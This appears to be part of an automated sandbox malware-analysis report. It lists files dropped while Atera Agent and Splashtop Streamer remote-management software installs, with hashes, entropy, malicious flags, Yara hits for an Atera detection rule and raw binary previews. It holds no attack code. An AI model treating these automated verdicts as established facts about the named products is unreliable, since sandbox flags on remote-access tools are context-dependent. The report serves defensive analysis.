                                                                                                                                                                                                                                                                                                                                  SHA-512:A22DD3B7CF1C2EDCF5B540F3DAA482268D8038D468B8F00CA623D1C254AFFBBC1446E5BD42ADC3D8E274BE3BA776B0034E179FACCD9AC8612CCD75186D1E3BF1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):711952
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.96669864901384
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12288:WBARJBRZl/j1TbQ7n5WLm4k0X57ZYrgNHgK9C1BSjRlXP36RMGy1NqTU+:WBA/ZTvQD0XY0AJBSjRlXP36RMG7
                                                                                                                                                                                                                                                                                                                                  MD5:715A1FBEE4665E99E859EDA667FE8034
                                                                                                                                                                                                                                                                                                                                  SHA1:E13C6E4210043C4976DCDC447EA2B32854F70CC6
                                                                                                                                                                                                                                                                                                                                  SHA-256:C5C83BBC1741BE6FF4C490C0AEE34C162945423EC577C646538B2D21CE13199E
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF9744CCB20F8205B2DE39DBE79D34497B4D5C19B353D0F95E87EA7EF7FA1784AEA87E10EFCEF11E4C90451EAA47A379204EB0533AA3018E378DD3511CE0E8AD
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\rundll32.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):61448
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.332072334718381
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:768:xieZDWtg+ESsRTgCayrMkp6SEI9016UJKdi1diF55U/h:xwg+ESsVgCayY/pYgwkd0Eh
                                                                                                                                                                                                                                                                                                                                  MD5:878E361C41C05C0519BFC72C7D6E141C
                                                                                                                                                                                                                                                                                                                                  SHA1:432EF61862D3C7A95AB42DF36A7CAF27D08DC98F
                                                                                                                                                                                                                                                                                                                                  SHA-256:24DE61B5CAB2E3495FE8D817FB6E80094662846F976CF38997987270F8BBAE40
                                                                                                                                                                                                                                                                                                                                  SHA-512:59A7CBB9224EE28A0F3D88E5F0C518B248768FF0013189C954A3012463E5C0BA63A7297497131C9C0306332646AF935DD3A1ACF0D3E4E449351C28EC9F1BE1FA
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):14156726
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.5773426483773
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:393216:EBRFUi+IgwaO79BRFUi+IgwaO76BRFUi+IgwaO7t:U5g/O7x5g/O7e5g/O7t
                                                                                                                                                                                                                                                                                                                                  MD5:7DFA0F38A5F779C5A231872A90382A4A
                                                                                                                                                                                                                                                                                                                                  SHA1:D9F9C026683321B99AA5B8F68E3108BE066BB61D
                                                                                                                                                                                                                                                                                                                                  SHA-256:F821E03150A8DDAACFBD6CC661BF9445D3C13FC6D4E02B6158712F15DDC6BB8B
                                                                                                                                                                                                                                                                                                                                  SHA-512:49F4DAF3EAC803C96850E89CD8C802EC9A361AC41BFFD4D540C8353889199ECB2C141B4B3D3292F94BB98A282F9C7314398E55E9A1F37B1033391542FF42D7D2
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...@IXOS.@.....@.^Y.@.....@.....@.....@.....@.....@......&.{B7C5EA94-B96A-41F5-BE95-25D78B486678}..Splashtop Streamer..setup.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{1FFB34B4-02B4-4EEE-ACA4-24941A8EDEE5}.....@.....@.....@.....@.......@.....@.....@.......@......Splashtop Streamer......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........Util_UpdateSetting....J...Util_UpdateSetting.@......1.H.MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........h.[...[...[....;..R....:..C....;..Z....:.......:..........\.......Z......^.......L...[........;..#....;..Z....;..Z...[...Z....;..Z...Rich[...........PE..L....;.d...........!.....l...........[....................................................@.............................g;...a.......p.......................P...7......8............................ ..@...............H...H\.......................text...2f...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):4718641
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.577367326443097
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:98304:k3H5BNwueVRfshljU+cCD+EA2IvtynSyeGPCXtoa3yRHbXLjtQ:k3H5BNMshFUi+sng/oaO7y
                                                                                                                                                                                                                                                                                                                                  MD5:25A0AA722268B17888B4E159A9F82F18
                                                                                                                                                                                                                                                                                                                                  SHA1:68CCB5ADAE9095056A9D5592F6A850F30715A86B
                                                                                                                                                                                                                                                                                                                                  SHA-256:72896D8ABEEEB40360596927C0FEADE8F0BC28F9937D35F646B9BA2A47F1EDCA
                                                                                                                                                                                                                                                                                                                                  SHA-512:79A574F95DBB5FF11E35F2938FCD6A9E22A3F1A35D7E032ACEB099DD69AD45DCDF006D92AEB7D1086E3D0615241F6669E510D5DEE6F7D262E0E3D4179822365D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1624765036517282
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjOoAGiLIlHVRpMh/7777777777777777777777777vDHFS6Q80tlp3XlN:J5QI5czQ80tb6F
                                                                                                                                                                                                                                                                                                                                  MD5:967BF8244F5010F04F9BF42A0D4759C3
                                                                                                                                                                                                                                                                                                                                  SHA1:3456A9FCD05BCD51BB02055E6E5E405794CD6390
                                                                                                                                                                                                                                                                                                                                  SHA-256:601380D102A0A5327A85E96CCD3C8C18C66EDCCF71FE17ACB20DDE5A01392698
                                                                                                                                                                                                                                                                                                                                  SHA-512:ACD871A6153A5C94F58BF859C80860D8552B05DEB17A24A27C55648E2D730EE2A5D0F4721BA156ABA88EB684154F95E04E02BFE3DF9EABDD09EBDF1052E2366A
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1728228471254394
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjkAGiLIlHVRpph/7777777777777777777777777vDHFw6CbWl0i8Q:J2QI5d5CXF
                                                                                                                                                                                                                                                                                                                                  MD5:3DD4C0AC6B7B662E1D68EC5C798E70F7
                                                                                                                                                                                                                                                                                                                                  SHA1:9757BCA0AB3233EAFC6283A10EBEEE0111732414
                                                                                                                                                                                                                                                                                                                                  SHA-256:726D119785B6FE3D76B85C6DB8E0B336000ED8AF18046D67BD7E97FD092DAB45
                                                                                                                                                                                                                                                                                                                                  SHA-512:4CDDFAC2FC713C61248B162650F6A33682F11FA4C77B34E39E51B935AFF15A959D2AA83845CFAFCDFF323C7D154E990F15C8EF317E95EF0FC4EBBD079E001982
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1748570491835126
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjkaAGiLIlHVRpUh/7777777777777777777777777vDHFxgIjNxKR/XlN:JeaQI5E5NxKJ6F
                                                                                                                                                                                                                                                                                                                                  MD5:C7D19DF5254610183477CD96E85EDCA7
                                                                                                                                                                                                                                                                                                                                  SHA1:EA4C6B540C3A85910F824F1EDA6EFCCB087E3E68
                                                                                                                                                                                                                                                                                                                                  SHA-256:5F3203BED5A206F89047CF96EADCD29E491796E3A93F457F698262759EDE9D76
                                                                                                                                                                                                                                                                                                                                  SHA-512:B7087AEB4279837172248EEB8B3321BAC09956EFEC745DF4A869F854B0AD439533D4A22DCD54E2D6B0717450D00A3DBE92AD7D852BE372204C1E0F4FB15F7722
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1677069665486992
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72FjrlAGiLIlHVRp+h/7777777777777777777777777vDHFcJJFg/p1l0i5:JTQI5WiJ+2F
                                                                                                                                                                                                                                                                                                                                  MD5:A1519D63C2FE7D2BFA6E51E6FB4FFB46
                                                                                                                                                                                                                                                                                                                                  SHA1:99BC435B9895D8D3B2E90ADE08B4E36603DF7FA1
                                                                                                                                                                                                                                                                                                                                  SHA-256:6FDD5E9B942F00102B36DBE29345CCAE54C25DF1CC5EEB7AEBDB3A5D78EAD976
                                                                                                                                                                                                                                                                                                                                  SHA-512:88BE11E7CC01DA570A66A967E90BD9F6BB3004E031FA1078A276D7316E4D6D99DEBE3A58F3E64E94EE3088F4030BFE507213F82D2A2D1D1536A503EF1C00C47D
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.1744810030025719
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:JSbX72Fj5YAGiLIlHVRpUh/7777777777777777777777777vDHFjfIaqR/Xl0i5:J8QI5ElIaqJ6F
                                                                                                                                                                                                                                                                                                                                  MD5:62E6D488EE2C1BF5898977155A8D3EC6
                                                                                                                                                                                                                                                                                                                                  SHA1:229971E613FDA91AF8AF470FC99C8D944FE9A4FB
                                                                                                                                                                                                                                                                                                                                  SHA-256:4FB46AA99829A96A3BDF7C97D15AC3F4E1F86A9BC30E37AAFB45537E0ED2518D
                                                                                                                                                                                                                                                                                                                                  SHA-512:9BF7BFA885EFFECAB872A6B2FE9E461242309CCEEBA2B45BEAD70DB0FEB21372C28103BE18A47BED9EB1BAB1E753A4C42FE91C6DAD09DE7DD7FDE4AE4BA3E4B2
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):20480
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):1.6046824865930789
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:48:QYz8Ph4uRc06WXzAFT5FRddWVSjndd4d/EqdGUDjxbQSSsndd4dXE8:Lah411FTvdWV93DtNg
                                                                                                                                                                                                                                                                                                                                  MD5:B92FF4A308F3B808673B7406600F4685
                                                                                                                                                                                                                                                                                                                                  SHA1:D67BCB2BE319C693B6EE2556516F093B93C0E2E3
                                                                                                                                                                                                                                                                                                                                  SHA-256:25D3A6AEC26C39755D64BB97348F23917D9AED9FCCF952344969E231E9510AC0
                                                                                                                                                                                                                                                                                                                                  SHA-512:5F4BD28F2284DA96EEE715B9A30C5F0EEB778EFD4DE530F04E97476592E121E9BF9A33EF88CFE8BD0AEB19F48BC58EF4A47736C6AD4E96EE7979DF4703601D9D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\Installer\inprogressinstallinfo.ipi, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):454656
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.348929773767357
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:D7f8m8end5Xy+1kvI8k9W91iVXuXskIhT:/h8edk+1kv5K+WhT
                                                                                                                                                                                                                                                                                                                                  MD5:149336F319D9AE2CA49E49FC61E834AC
                                                                                                                                                                                                                                                                                                                                  SHA1:E00591F432E8B306A349D76BF280736E4509E49F
                                                                                                                                                                                                                                                                                                                                  SHA-256:9E06D2D011DA7F988CF974584BB9F2D780D2460DAE92B02FF13F50FC2B3ED2E8
                                                                                                                                                                                                                                                                                                                                  SHA-512:BF7BC7C5FCD881C2A2E19914A0C3D765BED36D63C3FF0D60C07DA4CB8072F45DA3BC0DE7605BFE83B23E0572F1B700C0B613C049DC613F7470C095AE7EC9931D
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............C...C...C...C...CD..C...C...C...C=..C...C...C...C...C...CRich...C........................PE..L......a.................@...................P....@.........................................................................4T..(........^...........................................................................P...............................text....5.......@.................. ..`.rdata.......P.......P..............@..@.data....)...`...0...`..............@....rsrc....^.......`..................@..@................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\System32\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):432221
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):5.375173285661177
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:1536:6qELG7gK+RaOOp3LCCpfmLgYI66xgFF9Sq8K6MAS2OMUHl6Gin327D22A26Kgaub:zTtbmkExhMJCIpErW
                                                                                                                                                                                                                                                                                                                                  MD5:0434FDFCB2AEEDA365B78C0449D5C6E5
                                                                                                                                                                                                                                                                                                                                  SHA1:9E70A12F956F1E4510CCF20C3ADF2FFE8574DE6C
                                                                                                                                                                                                                                                                                                                                  SHA-256:EB7E615EBCA7AA26CFF91080E6124BFBE9D1EA8D268AF7CC95487E70B97EC8F4
                                                                                                                                                                                                                                                                                                                                  SHA-512:E1E6548EB986E3205B9F6EFCE2D5CDBAA45FF775316DD5AE94C260CDF37205B531F5486B7904EDEA4BB0129084F1F0F3324D41CE44FB0178E669C27949571C1F
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:.To learn about increasing the verbosity of the NGen log files please see http://go.microsoft.com/fwlink/?linkid=210113..12/07/2019 14:54:22.458 [5488]: Command line: D:\wd\compilerTemp\BMT.200yuild.1bk\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe executeQueuedItems /nologo ..12/07/2019 14:54:22.473 [5488]: Executing command from offline queue: install "System.Runtime.WindowsRuntime.UI.Xaml, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=b77a5c561934e089, processorArchitecture=msil" /NoDependencies /queue:1..12/07/2019 14:54:22.490 [5488]: Executing command from offline queue: install "System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil" /NoDependencies /queue:3..12/07/2019 14:54:22.490 [5488]: Exclusion list entry found for System.Web.ApplicationServices, Version=4.0.0.0, Culture=Neutral, PublicKeyToken=31bf3856ad364e35, processorArchitecture=msil; it will not be installed..12/07/2019 14:54:22.490 [
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.566641767500083
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:5o6Tq9Kw5h44ToW37UtAwYL7Mjx8D2+CUxb9AsYKWlEiC0443gQiJiv0NQL:5yR7sAwYHMjxV+NJ9/HWlXC0zlGi0NQL
                                                                                                                                                                                                                                                                                                                                  MD5:A80AA2B8CDF2BC0C082A0C61B009622F
                                                                                                                                                                                                                                                                                                                                  SHA1:45BE3065696447A22DBDA31AE336AC80C043B96A
                                                                                                                                                                                                                                                                                                                                  SHA-256:97EC8BEA6C244C35FBAF979A39BF6238CBF6B599E9C53EB56D758A8A8E2773E2
                                                                                                                                                                                                                                                                                                                                  SHA-512:26AB8DCCCF68322769A64B00EFCC5939CE7494FE7B38824D572A0A03227CF86CE74578AEEF55A2B3A116DB1C94322FDE5A8F40ECB5D45BB2CAB889E0AAF48185
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):727
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.583727811926715
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:5onfZNc5RlRtBfQDZszog95aoGPj+SxY/uvV/AUy1f0BOuIqU21yX1:5i3cdZMZS6JPqlu9/QfF21yl
                                                                                                                                                                                                                                                                                                                                  MD5:BCFD43B53A47B2DCF107EFDCBD0B59A4
                                                                                                                                                                                                                                                                                                                                  SHA1:75B548DF2AECB2DEC9A995C9FF974BE78959411A
                                                                                                                                                                                                                                                                                                                                  SHA-256:B0FA8FF8516C233400FF93675D5091C6747A19287D70C92C470FB30978868FA6
                                                                                                                                                                                                                                                                                                                                  SHA-512:F473CFEF0228F41B471E67AD3DBFE5715BA9AAB9EB541F27445DA87B8944BCD6A3560AB3E5E57A440F8A626B9137FDCD85AA2A50366F67EC61F478B4C7CEA634
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):408
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9023346301359014
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kK6CdG//wOfOAUMivhClroFHXHDZA6liyZlSlMul0bg3PWovy28lhlyG9ylpjyo4:kgOmxMiv8sF3HtllJZIvOP20Z8oF
                                                                                                                                                                                                                                                                                                                                  MD5:B29701DB4700867332FF130994DB054B
                                                                                                                                                                                                                                                                                                                                  SHA1:DBAC20A37116E351D42413AE0AB44FA453609B7C
                                                                                                                                                                                                                                                                                                                                  SHA-256:D8940ED4363891A4ADEE2EFC9F83ED9A8E7E08FEF0841FBC06D0398F2CA04379
                                                                                                                                                                                                                                                                                                                                  SHA-512:22113DD8E32DB6BAFCC9CCDCD7184A8369D17ED9A13D39469308FADE00783128D652C2F91DBA025C900EE2B0EE9B2555B6BA18EEFEB0B79B4B7405339EFF6FF5
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ....$...vO.t.+..(..................*.*......W0......................W0.. ............+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.S.R.X.e.r.F.0.e.F.e.S.W.R.r.i.p.T.g.T.k.c.J.W.M.m.7.i.Q.Q.U.a.D.f.g.6.7.Y.7.%.2.B.F.8.R.h.v.v.%.2.B.Y.X.s.I.i.G.X.0.T.k.I.C.E.A.c.c.8.p.W.v.3.e.y.M.Y.M.0.8.I.P.Z.f.5.%.2.F.0.%.3.D...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):412
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):3.9740165899121087
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:kKMqjleaRIKQTKfOAUMivhClroFfJSUm2SQwItJqB3UgPSgakZdPolRMnOlAkrn:kil3RmxMiv8sFBSfamB3rbFURMOlAkr
                                                                                                                                                                                                                                                                                                                                  MD5:1DC66FD6B2F440347987B0864855B33F
                                                                                                                                                                                                                                                                                                                                  SHA1:3ADB0BA718DA960982C9A9A371B2F64BA831A475
                                                                                                                                                                                                                                                                                                                                  SHA-256:38DFC45BD2BC250D0DDF0A068308BA86CC411B217A566D8E5F1E08EC5C7BDFAE
                                                                                                                                                                                                                                                                                                                                  SHA-512:F6F26607574C71724070895B5AB470D1A8800FA8624D3AE4C2AE65BFCD2F9B834F07EE529459F3623B646E67C5A21B05D76BE1F3243CF5CF1E10BD9651D587E1
                                                                                                                                                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:p...... ....(...7..b.+..(..................F2*.....n./.....................n./.. .........#..+.. ...................h.t.t.p.:././.o.c.s.p...d.i.g.i.c.e.r.t...c.o.m./.M.F.E.w.T.z.B.N.M.E.s.w.S.T.A.J.B.g.U.r.D.g.M.C.G.g.U.A.B.B.T.f.I.s.%.2.B.L.j.D.t.G.w.Q.0.9.X.E.B.1.Y.e.q.%.2.B.t.X.%.2.B.B.g.Q.Q.U.7.N.f.j.g.t.J.x.X.W.R.M.3.y.5.n.P.%.2.B.e.6.m.K.4.c.D.0.8.C.E.A.i.t.Q.L.J.g.0.p.x.M.n.1.7.N.q.b.2.T.r.t.k.%.3.D...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):704
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):4.805280550692434
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:12:tIDRFK4mAX7RBem7hccD+PRem7hUhiiGNGNdg6MhgRBem7hccD+PRem7hUGNGNkm:Us43XVBVhcmMRVhMipNVeBVhcmMRVhro
                                                                                                                                                                                                                                                                                                                                  MD5:EF51E16A5B81AB912F2478FE0A0379D6
                                                                                                                                                                                                                                                                                                                                  SHA1:B0F9E2EE284DD1590EA31B2D3AD736D77B9FC6A7
                                                                                                                                                                                                                                                                                                                                  SHA-256:2C5D5397CEDF66DB724FED7FB4515B026A894F517A0DFBE8AE8ADF52DB61AA22
                                                                                                                                                                                                                                                                                                                                  SHA-512:296A11DB55BFEE7D87897BB63BC9E2C05786D3FD73A894DA5AF76F7A756495C6CCC0959C88844DFB5560DE2374A257201D960E004EC09D8C9DFB50952C5EF2D2
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Yara Hits:
                                                                                                                                                                                                                                                                                                                                  • Rule: JoeSecurity_AteraAgent, Description: Yara detected AteraAgent, Source: C:\Windows\System32\InstallUtil.InstallLog, Author: Joe Security
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Preview:...Running a transacted installation.....Beginning the Install phase of the installation...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Install phase completed successfully, and the Commit phase is beginning...See the contents of the log file for the C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe assembly's progress...The file is located at C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.InstallLog.....The Commit phase completed successfully.....The transacted install has completed...
                                                                                                                                                                                                                                                                                                                                  Process:C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                                                                                                                                                                                                  File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):326664
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):6.273611352763876
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6144:gpWGtJblMMuWntMAHeVQHe3lPpAyQ4L/8mJEDJnMihRD+ae7/lXCU:tGtJblMMuWntyxOyQ4LkIyxypCU
                                                                                                                                                                                                                                                                                                                                  MD5:D2A501F07C9F9373F11CC89FB2D49D8C
                                                                                                                                                                                                                                                                                                                                  SHA1:37EAADAF61D2CBE697F1C454640F9E04F4CD2D16
                                                                                                                                                                                                                                                                                                                                  SHA-256:A25A7C80A4BD007248306E02FBC10436885C64CC70A40433143BC82C641D3480
                                                                                                                                                                                                                                                                                                                                  SHA-512:B20727B34287D5877D94963B08F520E586C2A66A39631C768CF2F6ACA31959DFB2711C8043E71DA4FA8A00DF039E886D30B0D7DC2E85FEFC68E99761F3945B54
                                                                                                                                                                                                                                                                                                                                  Malicious:true
                                                                                                                                                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                                                                                                                                                  Process:C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe
                                                                                                                                                                                                                                                                                                                                  File Type:data
                                                                                                                                                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                                                                                                                                                  Size (bytes):471
                                                                                                                                                                                                                                                                                                                                  Entropy (8bit):7.163915636596036
                                                                                                                                                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                                                                                                                                                  SSDEEP:6:J0MgYPq9I3t5o7UmhVPqn1qqfuJfkEnFI4ykZKj7sBtAQwmdualsSy7v9FLdO/i2:JyYOI3t5GLsHIfZIey9mduzSyRxI/rP
